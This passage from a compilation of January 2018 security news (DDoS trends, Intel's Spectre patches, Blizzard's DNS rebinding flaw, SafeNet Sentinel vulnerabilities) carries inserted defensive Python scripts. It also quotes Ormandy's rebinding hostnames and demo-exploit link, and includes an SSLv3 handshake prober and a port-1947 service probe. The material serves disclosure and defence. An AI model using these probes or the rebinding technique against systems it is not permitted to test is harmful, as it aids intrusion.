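    or mitigated purely in software, i.e. none of IBRS/IBPB/STIBP is in use:
    the case where only a microcode update completes the fix."""
    for s in statuses:
        if s.issue == "spectre_v2":
            return s.state == "vulnerable" or (
                s.state == "mitigated" and not any(s.features.values()))
    return False


# Constructed sample in the exact format the kernel writes, for hosts that
# are not Linux or not yet patched.
SAMPLE = {
    "meltdown":   "Mitigation: PTI",
    "spectre_v1": "Mitigation: __user pointer sanitization",
    "spectre_v2": "Mitigation: Full generic retpoline, IBPB, IBRS_FW, STIBP: disabled",
}


def parse_sample() -> List[Status]:
    return [parse_status(k, v) for k, v in SAMPLE.items()]


if __name__ == "__main__":
    statuses = read_sysfs() if os.path.isdir(SYSFS_DIR) else parse_sample()
    for s in statuses:
        print(f"{s.issue:12} {s.state:12} {s.detail}")
    print("Variant 2 still needs microcode:", variant2_needs_microcode(statuses))
```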


IoT Devices Fuel Complex DDoS Attacks: Report
23.1.2018 securityweek IoT

The continuous use of compromised Internet of Things (IoT) devices to launch distributed denial of service (DDoS) attacks has helped cybercriminals increase the complexity of their assaults, NETSCOUT’s Arbor Networks says.

According to the company’s 13th Annual Worldwide Infrastructure Security Report (WISR), attackers focused on increasing complexity in 2017, and the exploitation of IoT devices helped them achieve this goal. The frequency of attacks has increased as well, following a trend seen for the past several years.

The report is based on 390 responses received from a mix of Tier 1, Tier 2 and Tier 3 service providers, hosting, mobile, enterprise and other types of network operators globally. More than half of respondents are headquartered and operate in North America.

Last year, 57% of enterprise, government and education (EGE) respondents and 45% of data center operators had their network resources depleted due to DDoS attacks. Arbor observed 7.5 million DDoS attacks in 2017.

The largest attack reported by a service provider peaked at 600 Gigabits per second (Gbps), with only one quarter of respondents observing attacks that peaked at over 100Gbps. While the number of very large incidents decreased, attackers used more metered attack volumes to achieve their goals, the report reads.

Attack durations surged last year, with 29% of service providers saying they experienced attacks of over 12 hours. 45% of respondents said they experienced more than 21 attacks per month, while 17% were hit more than 500 times per month.

Service providers reported more volumetric attacks, while enterprises noticed a 30% increase in stealthy application-layer attacks. Multi-vector attacks hit 59% of service providers and 48% of enterprises, combining high volume floods, application-layer attacks, and TCP-state exhaustion assaults in a single sustained offensive.

The number of enterprises experiencing stealthy application-layer attacks increased 30% last year. 73% of the attacks targeted HTTP, 69% targeted DNS, and 68% targeted HTTPS. The number of assaults targeting encryption servers went up as well, with 53% of detected attacks aimed at the application layer and 42% of them targeting the SSL/TLS protocol.

Organizations appear to better understand the need for defenses and 77% of responding enterprises said DDoS was either a part of their business or their IT risk assessments in 2017.

DDoS attacks had various and more severe consequences, ranging from reputation/brand damage (57% of respondents) to concerns about customer churn (48% of respondents). The financial impact of DDoS attacks doubled compared to 2016, as 56% of respondents admitted to losses of between $10,000 and $100,000.

The increase in the threat landscape’s complexity challenged network and security teams. 88% of service providers said they use Intelligent DDoS Mitigation Solutions, while 36% revealed they employ technology that automates DDoS mitigation.

Demand for managed security services is increasing as well, driven by a surge in attack frequency, and 38% of enterprises revealed they rely on third-party and outsourced services (up from 28% the previous year). However, only 50% of respondents said they carried out defensive drills.

Nearly half of respondents have difficulty hiring and retaining skilled personnel. Thus, organizations have less time to conduct incident response training. Fewer organizations and service providers are carrying out defensive drills or plan on doing so, the report reveals.

“Attackers focused on complexity this year, leveraging weaponization of IoT devices while shifting away from reliance on massive attack volume to achieve their goals. Attackers have been effective, and the proportion of enterprises experiencing revenue loss due to DDoS nearly doubled this year, emphasizing the significance of the DDoS threat,” said Darren Anstee, NETSCOUT Arbor Chief Technology Officer.

Ransomware was the most commonly experienced attack last year, with DDoS in second place, but DDoS represented the top threat observed by service providers. Such assaults remain the top concern for 88% of these organizations in 2018 as well, fueled by the weaponized IoT botnets and the attackers’ ability to gain access to sophisticated assault techniques.


Facebook Offers $100,000 Grants for Improving Internet Security
23.1.2018 securityweek
Social

Facebook announced on Monday that it’s prepared to award $100,000 grants for research proposals focusing on improving online security, privacy and safety.

The new project, called “Secure the Internet Grants,” is part of the initiative announced last summer by Facebook CSO Alex Stamos. Stamos revealed at the Black Hat conference that the social media giant had prepared $1 million in funding to encourage original defensive research.

For Secure the Internet Grants, university researchers and faculty, NGOs, and non-profit organizations have been invited to submit proposals for innovative and practical technology. A wide range of topics are accepted, including anti-phishing, user safety, post-password authentication, abuse detection and reporting, privacy-preserving technologies, and user security in emerging markets.

Image: Facebook launches Secure the Internet Grants

Applicants are required to submit a 2-page proposal detailing their ideas and how the grant funding will be used to put them into practice. Facebook is prepared to award up to $100,000 per proposal, depending on the specific requirements.

The deadline for submitting proposals is March 30. Selected award recipients will be notified in May and winners will be announced at Black Hat USA 2018.

“Good defense comes from understanding offense,” Stamos said last year at Black Hat. “The research presented at Black Hat and elsewhere is critical in understanding the kinds of flaws we face now and in the future, and it helps us build a base of knowledge that can be used to design more trustworthy systems. That being said, the balance of incentives is a bit off, and we need to figure out ways to encourage and celebrate risk-taking defensive research alongside spectacular vulnerability demonstrations.”

Facebook has made significant investments in securing its own platform and the Internet in general.

Last year, Facebook awarded $100,000 to a team of researchers as part of the 2017 Internet Defense Prize for designing a novel technique of detecting spear-phishing attacks in enterprise environments.

As for its own platform, the social media company paid out nearly $900,000 last year for vulnerabilities reported by external researchers, bringing the total paid since the launch of its bug bounty program in 2011 to more than $6.3 million.

Facebook’s founder and CEO, Mark Zuckerberg, recently stated that protecting the community is more important than maximizing profits.


Insurers, Nonprofits Most Likely to Fall for Phishing: Study
23.1.2018 securityweek
Phishing

The employees of insurance companies and non-profit organizations are most likely to fall for phishing attacks, according to a study conducted by security awareness training firm KnowBe4.

KnowBe4’s study is based on data collected from six million users across 11,000 organizations. The company has tested users at three stages: before any awareness training, after 90 days of initial training and simulated phishing, and after one year of training.

The average phish-prone percentage, represented by the percentage of employees that clicked on a link or opened an attachment during testing, was 27% across all industries and organizations of all sizes.

In the case of small and mid-size organizations (under 1,000 employees), insurance companies have the highest percentage of phish-prone employees, specifically 35% and 33% respectively. In the case of large organizations, nonprofits are at the top of the list, with roughly 31% of employees taking the bait during the baseline phishing tests conducted by KnowBe4.

The lowest phish-prone percentage was recorded in large business services organizations, where only 19% of employees took the bait.

Image: How likely are employees in different sectors to fall for phishing attacks

Unsurprisingly, 90 days after undergoing initial training and simulated phishing, the percentage of employees that fell for phishing attacks dropped significantly across all sectors and organizations of all sizes.

For example, in the case of the insurance industry, the phish-prone percentage dropped to 13% in small and large organizations, and 16% in mid-size companies. In the case of nonprofits, it dropped to 16-17%.

After one year of training, the phish-prone percentage dropped to 1-2% in most cases. The highest percentage of employees that still fell for phishing attacks, roughly 5%, was in large organizations in the energy and utilities, financial services, insurance, and education sectors.

“The new research uncovered some surprising and troubling results. However, it also demonstrates the power of deploying new-school security awareness training by lowering a 27 percent Phish-prone result to just over two percent,” said Stu Sjouwerman, CEO of KnowBe4.


SaaS webservice for Seagate’s GoFlex Home Storage devices vulnerable to MiTM and XSS
23.1.2018 securityaffairs
Vulnerability

A security expert found more than 33,000 of Seagate’s GoFlex Home network-attached storage (NAS) devices exposed online and vulnerable.
Seagate has patched several vulnerabilities in its Personal Cloud and GoFlex products, but unfortunately, some flaws remain unpatched.

In September, researcher Aditya K. Sood discovered vulnerabilities that can be exploited by attackers to launch cross-site scripting (XSS) and man-in-the-middle (MitM) attacks against the Seagate GoFlex Home NAS product.

GoFlex Home NAS devices rely on a web service at seagateshare.com that allows users to remotely manage the device and its content. Customers access their storage by providing the device name and their login credentials.

Image: Seagate’s GoFlex Home NAS

The GoFlex firmware runs an embedded HTTP server; to reach it through the web service, users must enable port forwarding on their router, which exposes the device's server directly to the Internet.

Sood noticed that the embedded HTTP server supports the obsolete SSLv2 and SSLv3 protocols, while the seagateshare.com web service still supports SSLv3.

Both protocols expose users to MitM attacks: SSLv2 to DROWN and SSLv3 to POODLE.

“It has been discovered that embedded server still supports SSLv2 / SSLv3 whereas the seagateshare.com supports SSLv3. We have looked into 50,000+ devices that are running on unique IPs that have SSLv2/ SSLv3 enabled.” states the analysis published by the expert. “Additionally, during standard tests, we have collected 17000+ URLs of seagateshare.com with unique device_ids.”
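To check whether a device or web service still negotiates SSLv3 (the POODLE precondition described above), here is an added Python probe; it is not part of Sood's analysis or of Seagate's software. Modern OpenSSL builds no longer speak SSLv3, so `openssl s_client -ssl3` is often unavailable; the probe instead hand-crafts an SSLv3 ClientHello record and classifies the first record the server sends back. The cipher-suite list is an arbitrary selection of RSA suites, the target host is an argument, and the sample ServerHello and alert bytes used to exercise the parser are constructed. SSLv2 uses a different record format and is not covered by this probe.

```python
"""Probe whether a TLS endpoint still accepts an SSLv3 handshake.

Added example, not code from the Seagate advisory or Sood's analysis.
"""
import os
import socket
import struct

SSLV3 = (3, 0)
CONTENT_HANDSHAKE = 0x16
CONTENT_ALERT = 0x15
HS_CLIENT_HELLO = 0x01
HS_SERVER_HELLO = 0x02

# Arbitrary RSA cipher suites any SSLv3-era stack recognises (TLS_RSA_WITH_*).
PROBE_SUITES = [0x0004, 0x0005, 0x000A, 0x002F, 0x0035]


def build_client_hello(version=SSLV3, suites=PROBE_SUITES):
    """Return one record carrying a minimal ClientHello for `version`."""
    major, minor = version
    body = struct.pack("!BB", major, minor)            # client_version
    body += os.urandom(32)                             # random
    body += b"\x00"                                    # empty session_id
    body += struct.pack("!H", 2 * len(suites))         # cipher_suites length
    body += b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                # compression: null only
    handshake = bytes([HS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BBBH", CONTENT_HANDSHAKE, major, minor, len(handshake)) + handshake


def parse_first_record(data):
    """Classify the first record a server returns.

    Returns ("server_hello", (major, minor)), ("alert", level, description)
    or ("other", content_type). Raises ValueError on truncated input.
    """
    if len(data) < 5:
        raise ValueError("record header truncated")
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    payload = data[5:5 + length]
    if len(payload) < length:
        raise ValueError("record body truncated")
    if ctype == CONTENT_ALERT and length >= 2:
        return ("alert", payload[0], payload[1])
    if ctype == CONTENT_HANDSHAKE and length >= 6 and payload[0] == HS_SERVER_HELLO:
        # ServerHello layout: type(1) length(3) server_version(2) random(32) ...
        return ("server_hello", (payload[4], payload[5]))
    return ("other", ctype)


def accepts_sslv3(response):
    """True when the server answered our SSLv3 ClientHello with an SSLv3 ServerHello."""
    kind, *rest = parse_first_record(response)
    return kind == "server_hello" and rest[0] == SSLV3


def probe(host, port=443, timeout=5.0):
    """Network call: send the probe to host:port and report whether SSLv3 was accepted."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        reply = sock.recv(4096)
    if not reply:
        return False  # server closed without answering: SSLv3 not offered
    return accepts_sslv3(reply)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    print(f"{target}: SSLv3 {'ACCEPTED' if probe(target) else 'rejected'}")
```

A server that has SSLv3 disabled normally answers with a protocol_version (70) or handshake_failure (40) alert, or simply closes the connection; only a ServerHello whose version field is 3.0 counts as acceptance.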

The expert also discovered an XSS flaw in the seagateshare.com website that an attacker could exploit to execute malicious code in the context of a user’s browsing session by tricking the victim into clicking a specially crafted link.

The bad news for Seagate users is that the company has only fixed the XSS flaw; it does not plan to fix the remaining issue, the continued support for SSLv2 and SSLv3.


Intel Warns Users Not to Install Its 'Faulty' Meltdown and Spectre Patches
23.1.2018 thehackernews
Vulnerability
Don't install Intel's patches for Spectre and Meltdown chip vulnerabilities.
Intel on Monday warned that you should stop deploying its current versions of Spectre/Meltdown patches, which Linux creator Linus Torvalds calls 'complete and utter garbage.'
Spectre and Meltdown are security vulnerabilities disclosed by researchers earlier this month in many processors from Intel, ARM and AMD used in modern PCs, servers and smartphones (among other devices), which could allow attackers to steal your passwords, encryption keys and other private information.
Since last week, users have been reporting spontaneous reboots and other 'unpredictable' system behaviour on affected computers after installing the Spectre/Meltdown patches released by Intel.
Keeping these problems in mind, Intel has advised OEMs, cloud service providers, system manufacturers, software vendors as well as end users to stop deploying the current versions of its patches until the chip giant develops 'a solution to address it.'
"We have now identified the root cause for Broadwell and Haswell platforms, and made good progress in developing a solution to address it," Intel said in a press release published on Monday.
"Over the weekend, we began rolling out an early version of the updated solution to industry partners for testing, and we will make a final release available once that testing has been completed."
Linus Torvalds Calls Intel's Meltdown/Spectre Patches 'Garbage'
Meanwhile, in a public email exchange, Linus Torvalds complained that he is not happy with Intel's approach to protecting the Linux kernel from the Spectre and Meltdown flaws, saying:
"They do literally insane things. They do things that do not make sense... I really don't want to see these garbage patches just mindlessly sent out. … I think we need something better than this garbage." Torvalds said.
Intel's patches require users to manually opt in and enable the fix at boot time, whereas security patches for such a critical flaw should be applied automatically.
This is because Indirect Branch Restricted Speculation (IBRS), one of three new speculation controls Intel offers through CPU microcode updates, is so expensive that enabling it by default would cause widespread performance hits.
In other words, to avoid poor benchmark results, Intel is leaving users to choose between performance and security.
New Intel patches will be available soon. Stay tuned.


Google hacker found a critical flaw in Blizzard Games that expose millions of PCs to DNS Rebinding attacks
23.1.2018 securityaffairs 
Attack

The white hat hacker Tavis Ormandy discovered a severe flaw in Blizzard games that exposes millions of PCs to DNS Rebinding attacks.
The notorious white hat hacker Tavis Ormandy of Google’s Project Zero team has made the headlines again: this time he discovered a severe flaw in Blizzard games that remote attackers could exploit to run malicious code on gamers’ computers.

The potential impact is enormous: millions of PCs are at risk. Every month, roughly half a billion users play popular online games created by Blizzard Entertainment, including World of Warcraft, Overwatch, Diablo III, Hearthstone and Starcraft II.

Image: Blizzard games

Playing Blizzard games is simple: players just need to install a client application called ‘Blizzard Update Agent’. The application runs a JSON-RPC server over HTTP on localhost port 1120 and “accepts commands to install, uninstall, change settings, update and other maintenance related options.”

“All blizzard games are installed alongside a shared tool called “Blizzard Update Agent”, investor.activision.com claims they have “500 million monthly active users”, who presumably all have this utility installed.” wrote Ormandy on a Chromium thread. “The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc’s are from a legitimate source”

Ormandy demonstrated that the Blizzard Update Agent is vulnerable to a ‘DNS Rebinding’ attack: any website can create a DNS name that it is authorized to communicate with (its own origin) and then make that name resolve to localhost.

The local Blizzard updater service does not validate the hostname the client requested (the HTTP Host header) and answers such requests anyway.

In practice, the website acts as a bridge between the external server and the victim's localhost; as Ormandy put it, “this means that *any* website can send privileged commands to the agent.”

An attacker creates a DNS entry that binds an attacker-controlled web page to 127.0.0.1, tricks users into visiting it, and can then remotely send privileged commands to the Blizzard Update Agent from JavaScript.

Ormandy published a proof-of-concept exploit that executes a DNS rebinding attack against Blizzard clients.

“I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames: https://lock.cmpxchg8b.com/rebinder.html Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:

$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1" wrote Ormandy.
“Exploitation would involve using network drives, or setting destination to “Downloads” and making the browser install dlls, datafiles, etc. I made a very simple demo, I’m sure it’s quite brittle, but hopefully you get the idea! http://lock.cmpxchg8b.com/yah4od7N.html See screenshot attached of how it’s supposed to look.”

Image: Blizzard Games Blizzard Update Agent is vulnerable to DNS Rebinding

Ormandy reported the flaw to Blizzard in December, but after initial communication Blizzard stopped responding to his messages. According to the expert, the company rolled out only a partial mitigation in client version 5996.

Ormandy was disappointed about the company’s behavior.

“Blizzard were replying to emails, but stopped communicating on December 22nd. Blizzard are no longer replying to any enquiries, and it looks like in version 5996 the Agent now has been silently patched with a bizarre solution.” wrote the expert.

“Their solution appears to be to query the client command line, get the 32-bit FNV-1a string hash of the exename and then check if it’s in a blacklist. I proposed they whitelist Hostnames, but apparently that solution was too elegant and simple. I’m not pleased that Blizzard pushed this patch without notifying me, or consulted me on this.”

Once Ormandy publicly disclosed the issue, Blizzard informed him that it had addressed the bug with a more robust Host header whitelist fix that was undergoing validation in a QA environment.


A silver bullet for the attacker
23.1.2018 Kaspersky  ICS
In recent years, vulnerabilities in industrial automation systems have become an increasingly important problem. The fact that industrial control systems have developed in parallel with IT systems, relatively independently and often without regard for modern secure coding practices, is probably the main source of ICS security problems. As a result, numerous custom solutions have appeared, including proprietary network protocols and algorithms for authentication and encryption. It is these solutions that have been the main source of threats discovered by ICS IT security researchers. At the same time, industrial automation systems inherit some of their problems from common technologies (examples include CodeSys Runtime, Microsoft Windows vulnerabilities, etc.).

Companies attach different priority levels to such problems and the risks associated with them. It is obvious for everybody that vulnerability information should never be disclosed until a patch is released. However, many companies believe that this information should not be published even when a patch is available. For software developers, this is always a blow to their reputation. And companies that use vulnerable systems are not always physically able to install a patch or this installation may involve significant costs (interrupted operation of the systems to be updated, the cost of work related to installing updates, etc.).

We assess risks based on our experience as a security system developer and supplier. We are convinced that it is absolutely essential to inform users of vulnerable software about the new threat and the need to update their software as soon as possible. This certainly does not guarantee that all users of vulnerable systems will promptly update them and the threat will go away. However, in our experience, if this is not done very few users update their systems in a timely manner, even if patches are available. We confront hundreds of thousands of new threats every day and we can see that threat actors are constantly looking for new attack opportunities. And we realize that by keeping silent about problems we give those threat actors a chance.

This is why we decided to share information on one of our discoveries: according to our research, connecting a software license management token to a computer may open a hidden remote access channel for an attacker.

Why we decided to analyze SafeNet Sentinel
While performing various penetration tests, Kaspersky Lab ICS CERT experts repeatedly encountered the same service on the computers of customers who used software and hardware solutions by different industrial vendors. The experts didn’t attach much importance to it until it was found to be vulnerable. The service was hasplms.exe, which is part of the SafeNet Sentinel hardware-based solution by Gemalto. The solution provides license control for software used by customers and is widely used in ICS and IT systems.

The solution’s software part consists of a driver, a web application and a set of other software components. The hardware part is a USB token. The token needs to be connected to a PC or server on which a software license is required. Some of the USB token models are listed in the table below.

License control solutions of this type are based on the following operating principles: a software product requires a license to operate properly; when a USB token is plugged into the computer, the software “sees” the license and becomes fully functional. The token must be plugged in every time the software is started and remain connected while it is in use. The software part of the Gemalto solution is installed once and remains functional regardless of the life cycle of the software requiring a token.

This Gemalto solution is used in products by other software vendors, including ABB, General Electric, HP, Cadac Group, Zemax and many other organizations; according to some estimates their number reaches 40 thousand.

According to the results of independent research conducted by Frost and Sullivan in 2011, SafeNet Sentinel, which is currently owned by Gemalto, has a 40% market share for license control solutions in North America and over 60% in Europe.

The number of end users who use Gemalto solutions is not known. However, if each company has 100 clients, the number of users is in the millions. Unfortunately, few people realize that connecting a token to a computer to control licenses may not be a safe thing to do.

Vulnerabilities and attack vectors
From researchers’ viewpoint, hasplms.exe exhibited a rather curious behavior in the system: it could be remotely accessed and communicated with on open port 1947. The protocol type was defined by the network packet header – either HTTP or a proprietary binary protocol was used. The service also had an API of its own, which was based on the HTTP protocol.

Analyzing the service was made more difficult by the fact that the binary file used a VMProtect-type protector and generated its bytecode from the original Gemalto code. Due to this, it was decided to use fuzzing as the main tool for analyzing the vulnerable service’s behavior.

First of all, we looked at the localization function: the user could download language packs consisting of two files, one of which was localize.xml. The second file, in HTML format, had parameters, one of which turned out to be vulnerable to buffer overflow. It would have been a simple vulnerability, if it wasn’t for one curious detail: although, as mentioned above, a protector was used, for some reason the developers did not use any of the classical mechanisms providing protection from such binary vulnerabilities (such as stack canaries/cookies, ASLR, etc.). As a result, a simple buffer overflow could allow an attacker to execute arbitrary code on the remote system.

Note that such software development flaws are very rare in modern solutions. As a rule, secure coding practices are implemented when developing serious commercial products (such as SDL – security development lifecycle), which means that security is designed into applications at the development stage, rather than being implemented as an additional option.

This attack vector can be used without LPE (local privilege escalation) – the vulnerable process runs with SYSTEM privileges, enabling malicious code to run with the highest privileges.

Sample script loading a language pack file

Result of Buffer Overflow exploitation, leading to RCE

The vulnerability was assigned the number CVE-2017-11496.

This was just one of the vulnerabilities we found. And the overall result of our research was disquieting.

In late 2016 – early 2017, 11 vulnerabilities were identified: two allowed remote code execution if exploited and nine were denial-of-service vulnerabilities.

By June 2017, Kaspersky Lab ICS CERT had identified three more vulnerabilities: an XML bomb and two denial-of-service flaws, one of which could potentially lead to remote execution of arbitrary code.

In total, 14 vulnerabilities have been identified, all quite dangerous (for example, exploitation of each of the Remote Execution of Arbitrary Code type vulnerabilities is automatically performed with SYSTEM privileges, i.e., the highest privilege level in Windows).

All attack vectors affecting the vulnerable service were multi-stage.

We promptly sent all information on the vulnerabilities identified to Gemalto. The vulnerabilities were assigned the following respective CVE numbers:

CVE-2017-11496 – Remote Code Execution
CVE-2017-11497 – Remote Code Execution
CVE-2017-11498 – Denial of Service
CVE-2017-12818 – Denial of Service
CVE-2017-12819 – NTLM hash capturing
CVE-2017-12820 – Denial of Service
CVE-2017-12821 – Remote Code Execution
CVE-2017-12822 – Remote manipulations with configuration files
In addition to vulnerability descriptions, we sent a description of peculiar functionality to Gemalto.

Peculiar functionality
Kaspersky Lab ICS CERT experts have found that hasplms.exe has some rather unusual functionality:

When a Gemalto USB token is first connected to a computer (even if the active session is locked), a driver and a service that accepts network connections on port 1947 are installed if Internet access is available.
If a driver is manually downloaded from the Gemalto website and installed, a driver and service that accept network connections on port 1947 are installed and port 1947 is added to Windows firewall exceptions.
If Gemalto software is installed as part of a third-party installation file, port 1947 is also added to Windows firewall exceptions.
There is an API function which enables or disables the administrative panel in the web interface, making it possible to modify the settings of the program part of the SafeNet Sentinel hardware-based solution. The panel is available by default on the localhost IP address – 127.0.0.1.
The API can be used to change the internal proxy settings for updating language packs.
After changing the proxy server, the service’s internal logic can be used to obtain the NTLM hash of the user account under which the hasplms.exe process is running (i.e., SYSTEM).
This appears to be an undocumented feature and can be used for stealthy remote access. It means that remote attackers can use these capabilities to gain access to the administrative panel of the Gemalto software, carry out attacks with system user privileges and conceal their presence after completing these attacks.

As mentioned above, Gemalto representatives were informed of this attack vector.

Non-transparent security
Solutions, technologies or individual software modules used by many third-party vendors often do not undergo proper security testing. This potentially opens up new attack vectors. At the same time, closing vulnerabilities in such products, which are often used, among other applications, in banking and industrial control systems, is not always a smooth process: for some reason, vendors of such systems are in no hurry to notify their users of problems identified in their products.

In early 2017, we sent information about 11 vulnerabilities we had identified to Gemalto. It was only in late June that, in response to our repeated requests, the vendor informed us that a patch had been released and information about the vulnerabilities that had been closed, as well as a new version of the driver, could be found on the company’s internal user portal.

On June 26, we informed Gemalto of the suspicious functionality and of three more vulnerabilities. This time, things went quicker: on July 21 the vendor released a private notice on a new driver version – without any mention of the vulnerabilities closed.

According to Gemalto, the company has notified all of its customers of the need to update the driver via their account dashboards. However, this was apparently not sufficient: after we published information about the vulnerabilities identified, we were contacted by several developers of software which uses hasplms. It became clear from our communication with them that they were not aware of the problem and continued to use versions of the product with multiple vulnerabilities.

Update software to the current version (7.6) ASAP
We urge those users and companies that use Gemalto’s SafeNet Sentinel to install the latest (secure) version of the driver as soon as possible or contact Gemalto for instructions on updating the driver.

In the case of installing the driver via Microsoft Windows Update servers, we recommend checking hasplms.exe to make sure it is the latest version. If an obsolete version is used, it is crucial to install the latest (secure) version of the driver from the vendor’s website or contact Gemalto for instructions on updating the driver.

We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes. This will help to reduce the risk of the vulnerabilities being exploited.
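An added audit helper for the two recommendations above (checking the hasplms exposure and closing port 1947); it is not Gemalto's or Kaspersky's code. It parses the output of `netsh advfirewall firewall show rule name=all` to list inbound Allow rules that admit TCP 1947 (the firewall exception the installer adds), and it probes hosts for a listener on 1947 that answers HTTP, which is how the service can be found on a network. The netsh output embedded below is constructed for the demonstration and the first rule name in it is made up; the parser relies only on the `Key: value` layout that netsh prints.

```python
"""Audit helper for SafeNet Sentinel (hasplms.exe) exposure on port 1947.

Added example, not code from Gemalto or Kaspersky Lab ICS CERT.
"""
import socket
import subprocess

SENTINEL_PORT = 1947

# Constructed sample of `netsh advfirewall firewall show rule name=all` output.
# The first rule name is invented; the second is a stock Windows rule.
SAMPLE_NETSH = """
Rule Name:                            License Manager (constructed sample)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            1947
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:                             Core Networking
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Edge traversal:                       No
Action:                               Allow
"""


def parse_netsh_rules(text):
    """Turn netsh's 'Key:   value' blocks into a list of dicts, one per rule."""
    rules, current = [], None
    for line in text.splitlines():
        if not line.strip() or line.startswith("---"):
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Rule Name":
            current = {"Rule Name": value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def port_matches(spec, port):
    """netsh LocalPort may be 'Any', a number, a range '1000-2000' or a comma list."""
    if spec.lower() == "any":
        return True
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        if not lo.isdigit():
            continue
        if hi == "" and int(lo) == port:
            return True
        if hi.isdigit() and int(lo) <= port <= int(hi):
            return True
    return False


def rules_exposing_port(rules, port=SENTINEL_PORT, protocol="TCP"):
    """Names of enabled inbound Allow rules whose LocalPort covers `port`."""
    return [
        r["Rule Name"] for r in rules
        if r.get("Direction") == "In"
        and r.get("Action") == "Allow"
        and r.get("Enabled") == "Yes"
        and r.get("Protocol", "").upper() in (protocol.upper(), "ANY")
        and port_matches(r.get("LocalPort", "Any"), port)
    ]


def local_firewall_exposure(port=SENTINEL_PORT):
    """Run netsh on this Windows host and report the rules opening `port`."""
    out = subprocess.run(
        ["netsh", "advfirewall", "firewall", "show", "rule", "name=all"],
        capture_output=True, text=True, check=True).stdout
    return rules_exposing_port(parse_netsh_rules(out), port)


def answers_http_on_1947(host, timeout=3.0):
    """Network call: True if host:1947 accepts a TCP connection and replies to HTTP."""
    try:
        with socket.create_connection((host, SENTINEL_PORT), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
            return s.recv(64).startswith(b"HTTP/")
    except OSError:
        return False


if __name__ == "__main__":
    print("rules in sample opening 1947:", rules_exposing_port(parse_netsh_rules(SAMPLE_NETSH)))
```

Run `local_firewall_exposure()` on the Windows hosts that carry the token, and `answers_http_on_1947()` against your address ranges; any hit outside the segments that genuinely need license traffic is a candidate for the perimeter block recommended above.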

Some software vendors who use third-party solutions as part of their products may be very thorough about the security of their own code, while leaving the security of third-party solutions to other companies (the vendors of these solutions). We very much hope that most companies act responsibly both with respect to their own solutions and with respect to third-party solutions used in their products.


Critical Flaw in All Blizzard Games Could Let Hackers Hijack Millions of PCs
23.1.2018 thehackernews
Vulnerability


A Google security researcher has discovered a severe vulnerability in Blizzard games that could allow remote attackers to run malicious code on gamers’ computers.
World of Warcraft, Overwatch, Diablo III, Hearthstone and Starcraft II, popular online games created by Blizzard Entertainment, are played every month by half a billion users.
To play Blizzard games online, users install a client application called 'Blizzard Update Agent' onto their systems. It runs a JSON-RPC server over HTTP on port 1120 and "accepts commands to install, uninstall, change settings, update and other maintenance related options."
Google's Project Zero team researcher Tavis Ormandy discovered that the Blizzard Update Agent is vulnerable to a hacking technique called the "DNS Rebinding" attack that allows any website to act as a bridge between the external server and your localhost.
Just last week, Ormandy revealed a similar vulnerability in the popular Transmission BitTorrent client that could allow hackers to remotely execute malicious code on users' computers and take control of them.
By simply creating a DNS entry to bind any attacker-controlled web page with localhost (127.0.0.1) and tricking users into visiting it, hackers can easily send privileged commands to the Blizzard Update Agent using JavaScript code.
Although a random website running in a web browser usually cannot make requests to a hostname other than its own, the local Blizzard updater service does not validate what hostname the client was requesting and responds to such requests.
Blizzard DNS Rebinding Attack — Proof of Concept Exploit
Ormandy has also published a proof-of-concept exploit that executes a DNS rebinding attack against Blizzard clients and could be modified to exploit the issue by using network drives, or by setting the destination to "Downloads" and making the browser install malicious DLLs, data files, etc.
Ormandy responsibly reported the issue to Blizzard in December to get it patched before hackers could take advantage of it to target hundreds of millions of gamers.
However, after initial communication, Blizzard stopped responding to Ormandy's emails and silently applied a partial mitigation in client version 5996.
"Blizzard was replying to emails but stopped communicating on December 22nd. Blizzard is no longer replying to any enquiries, and it looks like in version 5996 the Agent now has been silently patched with a bizarre solution," Ormandy says.
"Their solution appears to be to query the client command line, get the 32-bit FNV-1a string hash of the exename and then check if it's in a blacklist. I proposed they whitelist Hostnames, but apparently, that solution was too elegant and simple. I'm not pleased that Blizzard pushed this patch without notifying me, or consulted me on this."
After Ormandy's report went public, Blizzard contacted him and said that a more robust Host header whitelist fix, addressing the issue entirely, was being prepared for deployment.
Ormandy is also checking other big game vendors with user bases of over 100 million to see if the problem can be replicated.
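As an added example tying together the two Blizzard articles above (it is not Blizzard's or Ormandy's code): the rbndr.us names Ormandy quoted encode the two addresses as eight hex digits each, and the fix he proposed is a Host header allow-list on the local JSON-RPC listener. A browser running attacker JavaScript can reach 127.0.0.1:1120 once the attacker's hostname has been re-bound to 127.0.0.1, but it cannot change the Host header it sends, which still names the attacker's domain; a local service that only honours requests whose Host is a loopback name therefore closes the hole. Port 1120 comes from the reports; the JSON-RPC method handling in the stand-in server below is a placeholder, not the agent's real interface.

```python
"""Host-header allow-list for a localhost JSON-RPC agent, plus the rbndr.us
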